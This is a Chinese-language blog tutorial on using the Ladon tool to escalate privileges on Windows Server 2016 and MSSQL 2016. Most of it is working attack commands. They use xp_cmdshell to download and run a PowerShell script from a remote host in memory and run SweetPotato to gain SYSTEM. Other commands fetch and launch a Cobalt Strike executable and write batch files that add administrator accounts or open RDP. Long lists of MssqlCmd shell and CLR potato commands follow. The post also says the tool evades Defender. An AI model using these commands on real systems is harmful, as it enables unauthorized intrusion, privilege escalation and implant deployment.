logo

K8哥哥

没有绝对安全的系统

〖教程〗Ladon提权Win2016/Win10/MSSQL2016

提权 2021/01/19

本文于 1524 天之前发表

测试环境

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon本地用户权限提权

网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
image

MSSQL远程加载Ladon提权

执行SQL查询权限为network service

image

远程内存加载PowerLadon提权

1
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon SweetPotato "whoami""'

image

ECHO写入BAT执行多行命令提权

1
exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat'

可ECHO写入添加管理员用户命令或者开3389等操作(举一反三不要只懂WHOAMI)

使用SYSTEM权限执行BAT

1
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""'

Wget下载Coblat Strkie的EXE

1
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget https://k8gege.org/cs.exe"'

使用SYSTEM权限执行CS

1
exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""'

Mssql数据库远程提权工具

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

本地:

Ladon MssqlCmd host info
Ladon MssqlCmd host open_shell
Ladon MssqlCmd host close_shell
Ladon MssqlCmd host xp_cmdshell cmdline
Ladon MssqlCmd host ws_shell cmdline
Ladon MssqlCmd host r_shell cmdline
Ladon MssqlCmd host py_shell cmdline
Ladon MssqlCmd host install_clr
Ladon MssqlCmd host uninstall_clr
Ladon MssqlCmd host clr_exec cmdline
Ladon MssqlCmd host clr_efspotato cmdline
Ladon MssqlCmd host clr_badpotato cmdline

远程:

Ladon MssqlCmd host user pass master info
Ladon MssqlCmd host port user pass master open_shell
Ladon MssqlCmd host port user pass master close_shell
Ladon MssqlCmd host user pass master xp_cmdshell cmdline
Ladon MssqlCmd host user pass master ws_shell cmdline
Ladon MssqlCmd host user pass master r_shell cmdline
Ladon MssqlCmd host user pass master py_shell cmdline
Ladon MssqlCmd host user pass master install_clr
Ladon MssqlCmd host user pass master uninstall_clr
Ladon MssqlCmd host user pass master clr_exec cmdline
Ladon MssqlCmd host user pass master clr_efspotato cmdline
Ladon MssqlCmd host user pass master clr_badpotato cmdline

image

Cobalt Strike

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
本机:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_badpotato cmdline

远程:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_badpotato cmdline

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

扫码加入K8小密圈

转载声明: 商业转载请联系作者获得授权,非商业转载请注明出处 © K8gege
Total:
Copyright © 2020 | Powered by K8gege